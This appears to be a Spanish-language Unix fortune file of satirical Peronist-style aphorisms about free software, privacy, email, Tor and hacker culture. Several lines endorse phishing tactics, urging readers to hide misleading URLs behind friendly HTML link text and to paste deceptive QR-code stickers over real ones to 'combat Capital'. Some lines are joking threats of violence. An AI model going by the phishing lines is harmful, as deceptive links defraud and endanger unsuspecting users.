Fortunes de Adoctrinamiento
por ~peron
La verdadera computación es aquella donde la CPU hace lo que el usuario
quiere, y defiende un sólo interés: el del usuario.
En la acción política la escala de valores de todo peronista es la
siguiente: primero la libertad de ejecución, después la de copia, y
luego los Hombres.
Si tiene CPU, puede peronizarse.
Compartir software es Libertar.
Todo software libre ha de poder trabajar junto con otro software libre:
para un software libre no ha de haber nada mejor que otro software
libre.
A los muchachos les gusta ponerse calificativos. Los hay Ubunteros, los
hay Debianeros, los hay Fedoreros, los hay OpenBSDeros. Pero todos
trabajan...
En nuestro sistema los únicos privilegiados son los usuarios.
Un hardware sin software es como un cuerpo sin alma. Por eso el
peronismo usa software libre.
Lo mejor viene en kilobytes.
Mejor que copiar es compartir, mejor que ejecutar es compilar.
Byte compartido es byte liberado.
Queremos un software socialmente justo, económicamente libre, y
políticamente soberano.
Constituimos un kernel monolítico, una paquetería organizada y
aplicaciones libres.
640K no deben ser suficientes para nadie.
Dentro de la Terminal, todo. Fuera de la Terminal, NI JUSTICIA.
Y cuando uno de nuestros servidores caiga, caerán cinco de los de ellos.
Compilar, base para Ejecutar. Ejecutar, base para Copiar. Y Copiar, base
para Compartir.
En la comunidad de hackers no existe más que una sola clase de hombres:
la de los que compilan.
Todo este mundo maravilloso que estamos viviendo -técnico y científico-
es consecuencia y se ha gestado con el sacrificio de los Pueblos,
especialmente de los trabajadores.
El cómputo ha de ser de quien lo trabaja, y no del que vive consumiendo
sin producir.
El hacker programa para el Movimiento del software libre. Quien sirve a
una compañía lo es sólo de nombre.
En GNU, compilar es un derecho que crea dignidad humana y es un deber,
porque es justo que todos compilen al menos lo que ejecutan.
Para nosotros un depurador no es un fin, sino el medio para el bien del
kernel y la grandeza y felicidad de sus hackers.
La organización de los paquetes y su ejecución tienen por fin el
bienestar de los hackers, dentro de un orden que atienda al desarrollo
de la Justicia Social.
Los dos brazos del hacktivismo son el Software Libre y el Hardware
Libre. Con ellos damos a los hackers un abrazo de Justicia y Amor.
El hacktivismo quiere la unidad de los hackers y no la lucha. Queremos
POSIX, pero no formateos.
El cómputo no es libre, o lo utiliza el Pueblo Organizado en beneficio
propio, o la utilizará el Capital en su desmedro irremediable.
Marcharemos con GNU en el Linux, o con Linux en el GNU.
GNU nos da la fuerza, POSIX la cohesión.
No es que los similares a Unix sean tan buenos. Es que los demás han
sido peores.
A más bits, menos tiempo.
Quien quiera copiar, que copie, y quien quiera compilar, que compile.
Y aunque deje en el browser metadatos de mi vida, yo sé que ustedes
copiarán mi código y lo llevarán como bandera a la victoria.
En computación jamás hay que piratear a nadie. Hay que decompilar todo
lo que se pueda.
Que sepan hoy los indignos farsantes que este pueblo no piratea a quien
no lo traiciona.
El Software Libre no es un programa, es una Doctrina.
El Software Libre es Justicia Social 2.0.
El software libre es la finalidad maquinada en el alma colectiva de la
comunidad organizada. Su arquitectura define sus formas de ejecución.
La unidad del código hace que cada programador vea los problemas, los
comprenda y los aprecie de una misma manera. Y de una misma manera de
percibir y de apreciar resulta una misma manera de compilar. Eso lleva a
la unidad de acción.
Que todos sean artífices del código común, pero ninguno instrumento de
la ambición de nadie.
Administrar Unix es fácil. Lo difícil es Conducir una Comunidad.
El Software Libre necesita apóstoles y para ser apóstol hay que estar
dispuesto a ser héroe, y solamente los fanáticos de amor por una causa
son capaces de morir por un ideal.
Dividimos la industria del software en dos categorías: una, la de los
hombres que programan, y la otra, la que vive de los hombres que
programan. Ante esta situación, nos hemos colocado abiertamente del lado
de los que programan.
Llevo en mis oídos la más maravillosa música: aquella sintetizada con
software libre.
Yo he visto BSDeros que se han vuelto Linuxeros, pero no he visto jamás
un Window$ero volverse inteligente.
Sin Software Libre no hay posibilidad de Justicia Social 2.0.
En nuestro tiempo, programar es crear Software Libre.
El Software Libre vence al Tiempo.
Cuando el disco rígido mecánico agota su vida útil, suele tronar como
escarmiento.
Copiar no es como muchos creen, piratear, copiar es distinto que
piratear, Piratear es ajusticiar, copiar es compartir, y al software
siempre es mejor compartirlo que piratearlo.
Esto se programa, se compila, se ejecuta, y recién después se copia. Es
decir, el software depende de esa acción, de una preparación, y de una
organización.
El kernel no se ejecuta de buenas ideas; se ejecuta de buenas
compilaciones.
Antes que las propias, es mejor reconocer las buenas ideas del Pueblo.
Programa en C lo que el Pueblo desea, y libéralo bajo GPLv3.
Creo que el software es movimiento, son acción no son solo pensamiento,
no son sólo concepción. Para mí, la acción está siempre por sobre la
concepción.
El software a nadie le sale al paso, no es obra de la casualidad, el
software es obra de la previsión, de la organización y la realización
libre.
No hay peor cosa que un Window$ero con inquietudes.
El consumo del software sube en ascensor, la potencia del hardware por
escalera.
¡Programadores! Únanse. Sobre la unidad de los que programan, ha de
levantarse en este hermoso server la unión de todas las aplicaciones.
Tengo tres honras en mi vida: la de ser un soldado, la de ser un
patriota y la de ser el primer programador argentino.
Que sea esta unidad indestructible e infinita, para que nuestro pueblo
no solamente posea su almacenamiento, sino que también sepa dignamente
defenderlo.
Primero el Kernel, luego la Shell, y por último las aplicaciones.
Se vence con inteligencia y organización. Por ello les pido también que
conserven una calma absoluta y cumplir con lo que es nuestro lema de
siempre: de /home a /var y de var/ a /home.
Se compila con inteligencia y con organización.
Todo sistema informático debería ser infalible, pero no es un arte de
los Dioses sino una creación humana, y como tal posee sus mismos bugs y
las mismas inclemencias que afectan a toda máquina engendrada en la
mente terrenal.
Este bug lo arreglamos entre todos o no lo arregla nadie.
La verdadera colaboración no es alabar siempre, sino señalar los bugs.
El programador debe escribir un lenguaje claro, esto llevará a realizar
un binario de verdad, que podrá compartir en amistad.
El verdadero hacker es el que aconseja.
El software libre ha de estar en capacidad de ayudarnos en cualquier
situación que se cuadre, incluyendo probables situaciones de emergencia.
No uses al Justicialismo como una variable. Hardcodéala.
Mal está llorar sobre la leche derramada, si el Software Libre puede
otorgarnos otra vaca, y gratis.
No podemos estar aislados. En los tiempos que corren, hemos de subirnos
a tren de las comunicaciones informatizadas y saludar a todo el mundo.
Cualquiera puede hacer uso de su informática sin costo monetario, y
permitiéndonos multiplicar su efectos positivos en todo tiempo y lugar.
Hemos de formar ágiles bandas telemáticas, encargadas de hacer tronar el
escarmiento y propiciar la independencia real de la Nación, su Pueblo y
su software.
Nuestro enorme campo de acción son las redes, pretendidas por el enemigo
pero dominadas por nuestro Pueblo.
Encomio lo compilado.
Mueran los salvages unarios.
El software privativo, que ha sido hasta ahora una forma disimulada de
la tecno-esclavitud, será suprimido. Eso se acabó.
Si el oligarca no puede pagar los metadatos, deberá vender su centro de
datos.
Donde hay una necesidad, nace un software libre.
La máquina, el servidor, el centro de datos y cualquier establecimiento
que se encuentre fuera de las leyes del trabajo, no pueden gozar de
ninguno de los beneficios que concede el Estado. Hay que tratados como
enemigos sociales.
El código es más poderoso que las leyes.
La infraestructura de correo electrónico que se utiliza en todo el mundo
es, por diseño, insegura.
La mayoría de los servidores de correo públicos no están controlados por
los destinatarios, sino que son ofrecidos por proveedores de Internet de
la oligarquía.
Debemos desconfiar de los servidores de correo ofrecidos por la
oligarquía. Han demostrado no tener escrúpulo alguno y acceder a
correspondencia electrónica de aquellos abonados a quienes consideran
riesgosos para sus planes inconfesables.
Los correos electrónicos conformados por código HTML permiten colocar
hiperenlaces de texto amigable para el usuario que oculten una URL. Sólo
debes utilizarlo para combatir al Capital.
Con sólo superponer una etiqueta autoadhesiva de un código QR que
codifique un hiperenlace HTML engañoso, hará que un usuario incauto
solicite copias de contenido informático remoto distinto al esperado en
su dispositivo de confianza. Recurre a esto para Combatir al Capital.
Colocar un hiperenlace HTML engañoso bajo un texto amistoso podría
llevar a los incautos a una página diferente a la esperada.
Un hiperenlace engañoso es un vector extremadamente común para los
ataques de suplantación de identidad. En ellos, un remitente malicioso
podría hacer que el usuario incauto solicite copias de contenido
informático remoto distinto al esperado.
El HTML es un conjunto de especificaciones extremadamente largo y
complicado, diseñado para navegar por la web, donde hay una gran
variedad de documentos, aplicaciones, etc.
El HTML fue diseñado sin tener en cuenta el correo electrónico.
Una gran parte (si no la mayoría) de las funcionalidades del HTML son
indeseables para el correo electrónico; si se incluyen pueden abusarse
para extraer información sobre ti, tus contactos, tu calendario, otros
correos en tu bandeja de entrada, etc.
La ejecución remota es una de las funcionalidades del HTML más abusadas
en el correo electrónico.
Los correos HTML son buenos para publicistas, pero malos para todos los
demás.
Todos los correos HTML enviados por publicistas incluyen identificadores
en los enlaces y en las imágenes que están diseñados para extraer
información sobre los usuarios y enviársela de vuelta a quien envía el
mensaje.
Examina con atención las URL: las ristras extrañas de números y letras
son únicas para ti y se utilizan para identificarte. Otros usarán dicha
información para manipularte, intentando buscar anuncios que son más
propensos a influir sobre tus hábitos de compra.
Navegar por la web es un gran reto para los individuos que necesitan un
lector de pantalla o alguna otra herramienta de asistencia para usar su
ordenador. Recurre desinteresadamente al texto plano y a las
descripciones alternativas de contenidos para ayudarlos.
Volver accesible un correo HTML a los individuos que necesitan un lector
de pantalla u otra herramienta de asistencia para usar el ordenador, es
incluso más complicado que hacer una web accesible, debido a las
limitaciones impuestas por la mayoría de clientes de correo electrónico.
Los correos en texto plano son pan comido para los lectores de pantalla,
especialmente para clientes de correo diseñados para ello.
Cuando redactes un correo electrónico en texto plano, es útil recortar
sus líneas a un ancho máximo de 72 caracteres, introduciendo saltos de
línea después de la palabra más cercana a dicho márgen.
Al responder un correo en texto plano, no propicies que se responda
sobre la cita. En lugar de ello, añade dos saltos de línea sobre el
mensaje citado. Esto permitirá que se edite el mensaje citado. Cita cada
línea del mensaje anterior con > y un espacio, seguido de la cita.
Aunque algunos clientes de correo electrónico intentan hacer creer lo
contrario, puedes editar la versión citada del mensaje al que estás
respondiendo, y es recomendable que lo hagas.
Puedes enfatizar tu correo electrónico en texto plano mediante
*asteriscos*, /barras/, _guiones bajos_ o MAYÚSCULAS, y evitarás los
enormes inconvenientes de utilizar HTML en ellos.
La oligarquía ha hecho - a falta de ley adecuada de protección - abusos
informáticos duraderos.
Para contrarrestar la insidiosa acción oligárquica sobre la telemática
contamos con dos soluciones libres interdependientes: la firma digital
de los mensajes de correo electrónico, y su cifrado por medio del
criptosistema GnuPG.
No todos podremos programar un núcleo de sistema operativo, pero si
todos podemos instruir a un Compañero en la senda para la liberación que
significa emplear un software liberado bajo licencia GPLv3.
No existen excusas para quien -sabiendo emplear programas libres-, no
pueda transmitir ese conocimiento a quien lo necesita.
La CPU debe estar al servicio de la economía nacional y tener como
principal objeto el bienestar social.
La PC es un bien individual en función social.
Como siempre sucede durante las actualizaciones de versión de sistema,
debemos proceder a realizar un respaldo de nuestros datos, por las dudas
que algo salga mal.
La cinta se desmagnetiza, los CDs se deslaminan, las redes se caen.
Prevenir es siempre mejor que curar, y una actualización de sistema
siempre es excusa adecuada para actualizar nuestras copias de respaldo.
RAID5 no es un respaldo.
Si bien al actualizar el sistema todo debería marchar adecuadamente, a
seguro se lo llevaron preso.
Si bien el quehacer y potencia de nuestra Doctrina están consolidadas en
los servidores y en los entornos de alta complejidad, es Ubuntu el
sistema que permite integrar con más amor al sector del usuario
descamisado.
Hemos desarrollado los sistemas multiusuario para la aplicación
científica, pero más que nada para dar una respuesta a la injerencia y a
la injusticia que significaban los sistemas operativos privativos.
Contra el Capital y contra el software privativo la lucha jamás ha de
darse por vencida. Cuántos han sido los cocodrilos bien intencionados
que han ido a roncar sólo para despertar envolviendo unos mangos...
Nuestro Movimiento, anclado en una vertiente de Justicia Social en el
software, ha desarrollado una red tan oscura como la piel de nuestros
grasitas. Se trata del proyecto Tor.
Un problema básico para el anonimato y privacidad digital radica en lo
obvio: que el enemigo intercepte el tráfico telemático.
Han de considerar el correo electrónico como lo que es: una carta
abierta. Si desean privar de su lectura a los contreras, habrán de
encriptarlo con GPG.
La mal llamada "nube" es en realidad una computadora ajena.
Si alguien dice que su computadora puesta en línea es una "nube", está
engañando con insidia a incautos. No ha de almacenarse allí información
alguna.
Si por absoluta necesidad debes almacenar información en una computadora
ajena que publicitan como "nube", asegúrate de encriptar dichos datos
muy severamente.
Yo no persuadía al Pueblo con kernels, porque un kernel poco persuade.
Yo persuadí al Pueblo con compiladores y con el cubo 3D de Compiz.
¿Y cómo construyo un kernel? Pedí usar el compilador GCC... no lo
conocía ni el gato. Y ahí empecé a compilar piezas de código. Y una cosa
lleva a la otra, y todas a la felicidad de los hackers...
El kernel es el núcleo del sistema operativo y equivale a su alma y
corazón. Lo de afuera es la shell: sólo cáscara.
El compilador GCC es el kilómetro cero de GNU.
Hemos programado y compilado un software: el GNU. Lo hemos hecho para
esta comunidad de hackers y para esta máquina, pero puede servir para
otras.
Y como nunca fuimos egoístas, desde que en todo momento pusimos
generosamente nuestra CPU al servicio del mundo, ofrecemos a todos los
hombres y mujeres nuestro software.
Nosotros queremos que cada programador conozca el código, y que esté
impulsado hacia los objetivos de la compilación.
El código fuente ha de ser de quien lo trabaja.
Nosotros queremos que cada programador se interese por su $HOME como si
fuera su propia casa, porque el Pubnix es la casa grande de todos los
hermanos de esta inmensa familia de hackers.
Nuestro Pubnix, al afirmar su deseo de unión en las redes, es dueño de
sí mismo, y capaz de defender la integridad de su existencia.
Nosotros vamos llevando adelante el entrelazamiento de datos porque allí
está el futuro de nuestra amistad con los demás hackers. Las comunidades
que entrelazan sus datos siguen siendo amigas, a pesar de las muchas
cosas que puedan ocurrir.
Hoy los hackers están construyendo nuevas comunidades. No se pueden ver,
excepto en la pantalla de una computadora. No se pueden visitar, excepto
a través del teclado.
Las comunidades del ciberespacio son tan reales y vibrantes como
cualquiera que pueda encontrar en un globo terráqueo o en un atlas.
Los hackers son personas reales al otro lado del monitor.
La unión de los hackers es consecuencia de la unión de los Pueblos.
Liberados de limitaciones físicas, nuestros hackers están desarrollando
nuevos tipos de comunidades cohesionadas y efectivas.
Las comunidades del ciberespacio que se definen más por intereses y
propósitos comunes que por un accidente geográfico.
En las comunidades del ciberespacio lo que realmente cuenta no es cómo
se ve o habla o qué edad tiene, sino lo que uno dice, piensa y siente.
No es sorprendente que los científicos hayan sido los primeros en
adoptar los nuevos medios electrónicos como su principal medio de
comunicación cotidiana.
Nuestras autopistas son cables y fibras ópticas; nuestro lenguaje, una
serie de unos y ceros.
Todo troncal de fibra óptica es sendero luminoso para la revolución del
baudio.
Llegará el día en que todos, no sólo los científicos, puedan disfrutar
de los beneficios similares de una comunidad global.
GCC, la unidad de los compiladores, y al que no le gusta, se jode, se
jode.
Hubo uno que hasta tuvo que hacer milagros para que lo siguieran doce.
Compilando este Kernel ya me siguen millones.
Un hacker usa la CPU función del Pueblo.
Un hacking es un acto de desobediencia tecnológica.
Existen especialidades dentro del hacking de computadoras. Un hacker de
algoritmos conoce el mejor algoritmo para un problema. Un hacker de
sistema conoce del diseño y mantenimiento de sistemas operativos. Y un
hacker de contraseñas sabe cómo descubrir la contraseña de alguien más.
De la calidad del kernel depende la calidad de las aplicaciones.
Al operar GNU correrá programas libres; que se compilan, modifican, y
aunque no quieran tener bugs, los tienen.
El software de GNU es un fin en sí mismo, no sólo medio. Son programas
de computadora cuyos usuarios han de tener las cuatro libertades y no
otras; programas que buscan la felicidad de la Comunidad Organizada.
Yo divido la acción de GNU en dos vertientes: la acción administrativa
(para la cual tiene un pequeño conjunto de aplicaciones en /usr/sbin), y
la acción de lucha, que sucede en /usr/bin.
Unix existía antes que GNU, pero fue GNU quien les dio el lugar que los
hackers merecían por justo derecho.
Un hacker debe ser - fundamentalmente - un amatéur, aunque los hackers
pueden recibir paga por su expertise.
La vida de un verdadero hacker es episódica, en lugar de programada.
Un hack puede ser cualquier cosa, desde una broma práctica a un
brillante programa novedoso de computadora.
En esta red de datos, lo mejor que tenemos es GNU.
Me hacen gracia los que se dicen hackers usando Window$. No hay hackers
fuertes en un sistema operativo débil.
El Pueblo que escribe código malicioso a menudo anhela el mayor retorno
por su inversión, de modo que intentan socavar a Window$.
A Window$ siempre es mejor formatearlo que emparcharlo.
En sus bugs se camufla Window$.
La gran discusión en la que se sumirá el mundo no radica en compilar el
software, sino quién conduce la compilación del software. Yo digo que la
compilación la tiene que realizar el Pueblo.
20 gigabytes organizados equivalen a 20 petabytes desorganizados.
El hacktivismo presupone la existencia de la CPU, del ser humano y de
una Comunidad Organizada mancomunadamente en pos de su Libertad.
Las redes de datos permiten el sirgimiento de Comunidades Organizadas,
precisamente porque la red permite nuevas formas de comunicación.
Una manera muy simple de análisis de tráfico telemático puede realizarse
en cualquier lugar intermedio, e incluso en estos casos simples, poner
en peligro a nuestra Masa de Acción y sus organizaciones.
Incluso si encriptamos la carga útil en nuestras comunicaciones, un
análisis superficial del encabezado del paquete puede aún revelar gran
parte de nuestras actividades y accionar.
Cualquier intermediario en las redes podría adaptarse a nuestros
patrones de tráfico telemático, y trazar conclusiones relativamente
acertadas sobre su contenido, las tácticas empleadas, etc.
Un actor dedicado puede escrutar la red empleando cruzados estadísticos
sofisticados para rastrear patrones de comunicación de individuos u
organizaciones específicas.
Quien programe, comente. Quien use, documente.
Adoctrinar sobre el software libre es tan útil como usar # para agregar
comentarios al código fuente.
Tor, a través de sus servidores, ayuda a reducir los riesgos telemáticos
inherentes a través del ofuscado y redistribución de las transacciones a
lo largo de múltiples secciones en la Internet.
WAIS, Altavista y Webcrawler marcaron la senda que irrevocablemente
seguirá Googl€. No existe manera de evitar el destino de quien -abusando
de la centralización- osa desafiar a los Pueblos.
Bajo la oscura capa de Tor se dificultará rastrear un par de enlace
desde su origen y hacia su destino específico, de la misma forma que una
liebre podría seguir una ruta rebuscada para perder al mastín.
Que todo FTP tenga su ARCHIE.
Antes que Googl€ estuvo Verónica.
Antes que Unix estuvo TENEX.
Antes que TENEX estuvo MULTICS.
Antes que MULTICS, estuvo CTSS.
Antes que CTSS, la nada.
Muchachos, ya saben para que es la cosa: si van a meterse con Window$,
pónganse dos antivirus. Uno arriba del otro.
El Movimiento ha desarrollado Mastodon, un software libre pensado para
establecer servidores autogestionados de contenidos para microblogging
federado. Es posible contar así con todas las ventajas del blogueo a
nivel microscópico, pero en un fediverso regido por nuestras propias y
convenientes reglas.
"Commodore 64, el cómputo para las Masas".
Las BBS desaparecieron cuando quisieron cobrar. Cobraron.
Si usted quiere armar una BBS paga, yo organizo una fuerza suficiente,
voy, y lo mato.
Debemos imponer distintos protocolos acordados para el envío y la
recepción de paquetes informáticos, dependiendo de su urgencia,
velocidad y volúmenes de bits a transportar. Esta es la manera en la que
se puede organizar - desde un punto de vista racional y técnico - el
manejo paquetizado de la información.
El FTP es un protocolo simple y popular, y si bien es posible utilizar
unas medidas de seguridad limitadas con él (en forma de sesiones únicas
con usuario y contraseña, directorios protegidos), actualmente se lo
considera un modo de comunicación básico, recomendado sólo para ficheros
y material que podamos considerar público.
Si un servidor posee servicio 'FTP anonymous' solamente con teclear la
palabra "anonymous" al solicitar su usuario, disfrutará acceso a dicho
sistema.
Disfruto transmitir ficheros con croc por su estilo en lugar de su
comodidad.
Al operar en superficie, nos podemos mantener al tanto gracias al
Internet Relay Chat, herramental imprescindible para entablar
comunicaciones telemáticas en tiempo real.
Las salas de chat IRC pueden diagramarse dentro de un servidor de la
forma que queramos a fin de lograr cierta privacidad, mediante el uso de
"canales" (las cuales también podríamos llamar "sub-salas").
Los usuarios de IRC normalmente pueden seguir el temperamento de crear
sus propias sub-salas temáticas, las que suelen indicarse con el símbolo
"#". Estas permiten orientar las charlas si fuese necesario.
Existen ricas subculturas basadas en el uso de programas de conversación
telemática.
Si bien es cierto que el IRC puede constituir una forma de interacción
cerebral atemorizante, mecánicamente deshumanizada, normalmente es todo
lo contrario.
IRC fue inventado para divertirse con las comunicaciones, y este
continúa siendo su uso más popular.
Fue el año 1988 cuando se compiló el primer programa de IRC, para
permitir la comunicación escrita síncrona entre múltiples usuarios
mediados por la Internet.
Los adeptos al IRC pueden fácilmente volverse adictos.
IRC es - en esencia - un flujo de datos no dirigido.
IRC es una forma de comunicación dinámica: nuevos mensajes aparecerán en
la pantalla, y reemplazarán a los viejos.
IRC cuenta con los elementos mínimos de comunicación necesarios para que
un grupo de compañeros cree un sentido compartido de comunidad.
En IRC, el discurso es efímero.
Los compañeros suelen dejar una pequeña "ventana abierta"; en ella se
proyecta el texto de una sala de conversación IRC.
Si aparece un mensaje en la ventana de conversación, significa que
alguien - en algún lugar del mundo - la escribió no mucho más que un
segundo atrás.
Cuando chateas no puedes ver al Pueblo, pero puedes inferirlo.
Sin expresiones faciales, tono de voz, lenguaje corporal, ambiente
físico compartido y otras pistas contextuales, las emociones pueden
transmitirse a través del chat IRC usando emoticones.
Muchos estudios de la comunicación en línea han demostrado que los
enlaces electrónicos tienen un efecto deshinibidor en los Pueblos.
Privado de las pistas del estado emocional que brinda el lenguaje
corporal, los individuos tienden a olvidar todo sobre los demás excepto
aquello que se presenta sobre el enlace ASCII.
Hospedados en máquinas Unix diversas, los compañrros pueden comunicarse
de pantalla a pantalla mediante el programa WRITE.
Los sistemas de chat que permiten a un individuo enviar mensajes
mecanografiados directamente al terminal de otra persona enlazada a la
misma máquina se remontan al cómputo de tiempo compartido de la década
de 1960.
Gran parte del software que recibo y envío está preparado en lenguaje
Python, el nuevo BASIC capaz de correr en todo tipo de máquinas.
Para conducir a Python, que mejor que un gestor de paquetes de facto: el
pip.
Un verdadero hacker ha de poseer la habilidad para dividir su
accionamiento informático en partes pequeñas comprensibles, que le
avalen la realización de muchos trabajos amenos. El total de sus
realizaciones será la suma y unión de las partes. Esta es la manera en
la que Unix nos permite proyectar un futuro provechoso.
Módem que no chilla, no conecta.
A módem rápido, ruido de línea.
El ruido de línea es una perturbación eléctrica en algún punto entre su
computadora y la otra máquina con la que se esté comunicando. & El ruido
de línea corrompe los datos.
Cuando se produzca el ruido de línea, verás símbolos inciertos en tu
terminal, en lugar de los caracteres que cabría esperar.
Sobre gustos no hay nada escrito. Yo prefiero los Pall Mall o los
Particulares picado grueso cortado a cuchillo, pero también puedo optar
por el charuto. En intérpretes de comandos, uso el Bourne Again Shell,
el mítico Bash.
Power$hell es inútil: no deja de ser una ajada bandera que Micro$oft
pretende imponer como reemplazo del poderoso Bash que todos hemos
aprendido a dominar.
Un usuario bisoño chocará con la necesidad de dominar fluidas relaciones
de fuerzas entre aquellos programas privativos y los libres.
Por principio nodal, lo natural tiende representar un equilibrio de
fuerzas, y la acción mas difícil es la que nos requiere destruir tal
equilibrio. Pero dejen que alguien tenga que pagar un paquete de
software y verán como se inicia el desequilibrio automáticamente: la
víscera más sensible es el bolsillo.
Yo no soy partidario de empezar a programar en grande para, muchas
veces, terminar en un programa mórbido; vale más seguir la senda de la
programación de las pequeñas cosas que, con el tiempo, se hacen grandes,
se consolidan y se hacen fuertes.
En programación hay ocasiones en las que la flexibilidad y la libertad
de acción se traducen en tragedia, peor incluso que la del célebre burro
que, puesto ante dos montones de heno, murió de hambre por no saber por
cual decidirse.
En el caso del sofware, más que dilemas, se debería hablar de
multidilemas (o dilemas súper ramificados). Pero en caso del software
libre todos estos se simplifican y sintetizan a uno solo: el de la lucha
contra las ciber-oligarquías.
Emplea las redes de datos para incitar el espíritu de juicio y lucha
contra las ciber-oligarquías.
La idea de partida, ésa que puede llegar mediante la intuición creativa,
por obra y gracia de la meditación trascendental, o por cualquier otro
medio por raro que pueda parecernos, se llama "algoritmo".
Un algoritmo es un conjunto de reglas o formas de actuar para la
resolución de un problema.
El problema de la liberación del software está ligado de manera
indisoluble con el de la Justicia Social, la soberanía política y la
independencia económica del Tercer Mundo, así como la distensión y la
cooperación internacional.
La Justicia Social en el cómputo bien vale inconvenir a los
tecno-oligarcas.
¡Lleva la Justicia Social a las Redes Sociales!
A un pato se lo caza con llamador; unos graznidos realizados con este
instrumento cerca de una laguna harán cureosear a una de estas aves y
ahí hay que atizarla. Instalar software libre también hace lo
procedente, y con uno que hable usted capturará dos o tres zonzos.
La integración de Linux y GNU ocurrió en 1992 cuando Torvalds adoptó la
licencia GPL para su kernel. Esto permitió que los usuarios combinaran
Linux con los componentes GNU para crear un sistema operativo libre y
completamente funcional conocido como GNU/Linux.
Para cazar una perdiz no efectuamos disparos al cielo con la escopeta
esperando que la casualidad nos ayude a pegarle a algo; la técnica
eficaz consiste en utilizar un perro avispado que busque en el pajonal y
nos levanta la perdiz. Un LiveCD con Linux puede hacer lo mismo.
La suma de todos los beneficios sociales benefician a todos. La
enseñanza de un sistema Unix tiene también las mismas implicancias.
Mas que de la piratería, yo soy partidario de la libre copia.
Es sabido que un programador ha de contar con las mejores herramientas
para hacer su trabajo. Pero muchas veces las mejores herramientas son
las que el mismo programador compila y amolda a sus necesidades.
Mi rol como Conductor del Movimiento me impone acercar de forma
paternalista las soluciones anheladas por las Masas del Pueblo. Por lo
tanto volcaré esta sapiencia para que cada uno lleve en su mochila el
bastón de Mariscal.
Si la conductora del desarrollo de software cuenta con un medio al menos
tan bueno como lo es Internet, y sabe dirigir sin coerción, muchas
programadoras serán, inevitablemente, mejor que una.
Al desarrollar software libre, podemos hacerlo en cualquier punto de su
escala de aplicación. Para ello nuestro software ha de poder correr en
macrocontroladores, pero también en microcontroladores. Debemos conocer
el lenguaje ensamblador, al que dominaremos rápidamente.
En esto la programación en C es como la naturaleza: es nuclear. Como es
nuclear el microcosmos, también es nuclear el macrocosmos. Y como este
software es capaz de correr en microcontroladores, también habrá de
correr en mainframes.
Debemos romper la tranquera del software privativo y si es necesario,
cortar la cadena y la mano de las oligarquías locales y cipayas.
Nuestros programadores lo han comprendido, y ustedes ya saben qué distro
tienen que instalar.
Me he hecho eco de aquella vieja demanda y anhelo, en la cual todos me
piden que les otorgue las herramientas más poderosas para su quehacer
diario. ¡La oligarquía nunca lo hizo! Sin embargo, nuestra Doctrina
avala que cada uno disponga de un potente Unix.
Programar es un arte, y como tal tiene su técnica y tiene su teoría.
Conociéndolas estas es mucho más fácil programar que ignorándolas.
Quien se dedica a la programación debe ser profundamente humanista. El
programador siempre trabaja para los demás, jamás para él.
Nuestros adversarios tienen menos calle que Venecia. Nuestro deber
fundamental es hacer pesar la valía de la libertad de modificación del
software, que nunca se presenta asfaltada, y extender nuestro sistema de
comando y control a través de valores que son nuestros.
Decir que la CPU es un microprocesador es lo mismo que decir que la CGT
es un hombre.
La CPU no es un chip. La CPU es un órgano.
"Es un chip P6: triplica la velocidad de un Pentium".
El Kernel constituye el órgano de la conducción táctica. El órgano de la
conducción estratégica es el Hacker.
Cuando HP hizo HP/UX y la IBM sacó AIX, supimos que la guerra Unix
estaba decidida. Porque si estos señores le quieren colgar un Unix al
mainframe, es porque no tienen ni calzón que ponerse pa' ir al baile.
En estos tiempos, pagar una licencia de software es un crímen.
Puntero mata web UI y justicialismo mata bigdata.
Un programador oficia como orquestador y Maestro Director, ofreciendo a
su olfato técnico lo mismo que un director de orquesta hace a su oído.
Orienta así su código en una pieza coherentemente concebida, en la que
la sumatoria de las subrutinas ejecutan una idea-fuerza común que la CPU
llevará a cabo.
Los avances tecnológicos han sido fundamentales para realizar la
evolución de los hombres. Lo han sido el fuego, la rueda, la vela, el
sextante, hasta terminar en el transistor y las redes conmutadas de
datos.
Si no hacemos lo necesario como individuos conscientes en una Comunidad
Organizada de la era de la Información, otros intentarán hacerlo por
nosotros para desinformarnos.
Nuestro Pueblo tiene la necesidad imperiosa de apropiar las tecnologías
de la información y darles nuevo uso como un duro ariete contra la
Oligarquía y las sinarquías que lo han dominado.
Cualquiera puede hoy producir contenidos audiovisuales y hacer
streaming, con tal de difundir el software libre a las Masas.
Clickbaiteando y viralizando podremos extender al Justicialismo a una
nueva dimensión.
A nuestro Movimiento no le venden globos. Nos ha caracterizado una sana
raigambre planfetaria que aclara a cada quien lo que tiene que hacer
bajo el lema "todos unidos triunfaremos". Si alguno cree aún en vacuas
promesas aéreas, les pinchamos el látex de una.
La responsabilidad que le cabe a los hackers no es otra que la que están
llevando a la realidad en base a su esfuerzo: formarse y organizarse.
Formarse para promover el progreso del kernel, y organizarse para
defender el sistema compartido y lanzarse hacia el futuro bajo el signo
del Software Libre.
Unix es el bombo. Sus hackers, la manguera.
¿En qué consiste y qué es cada una de las partes del método de la
programación? Primeramente especificar la situación, segundo, la
apreciación de esa situación; y tercero, la resolución que surge de esa
apreciación de la situación que hemos contemplado. Vale decir, que de la
situación y de la apreciación (o sea del fenómeno y del análisis) fluye
el código fuente.
La informática nos permite distribuir de forma electrónica todo tipo de
documentos, incluyendo libros, y torrentearlos en meros segundos.
La gran compresibilidad de los datos textuales al tornarlos en formato
digital vuelven aquella concepción "sin papel" en una Realidad Efectiva.
Un material impreso con tinta estable en papel libre de ácido y
resguardado en un armario seco y oscuro, permanecerá legible unos 200
años. Los bits carecen de material con calidad de archivo; ni siquiera
hay certeza de poder leerlos a los 50 años.
Desde el punto de vista biológico natural, estamos sometidos a los
términos de una Evolución - en la cual la naturaleza obra para mejorar
al más apto para lograr su trascendencia a través del tiempo. En el caso
de nuestro kernel, obramos creativamente para hacerlo trascender en el
tiempo bajo la ondeante bandera de la Libertad.
La Masa programa en Python. El Conductor en ensamblador.
El torrontés se comparte. El torrent también.
Huayra es un sistema operativo libre concebido para el plan de
informatización educativa Conectar Igualdad. Fue desarrollado en
Argentina por el Centro Nacional de Investigación y Desarrollo de
Tecnologías Libres (CENITAL), siguiendo los principios y libertades del
software libre. Puede ser utilizado, estudiado, modificado y
redistribuido.
La libertad de modificación no es una limosna, es un Derecho que la
comunidad se gana estudiando el código.
La modificación de usuario de un dispositivo que le pertenece para
asegurar que permanezca funcional es una solución perfectamente
razonable y legal.
Tengo en mi escritorio todo lo necesario para la conducción del sistema.
Esto es así gracias a la licencia GNU que nos ha proporcionado un norte
cardinal para nuestras acciones, y al Software Libre que lo ha
sustentado.
Quien quiera aceleración 3D, que programe; quien quiera bluetooth, que
compile.
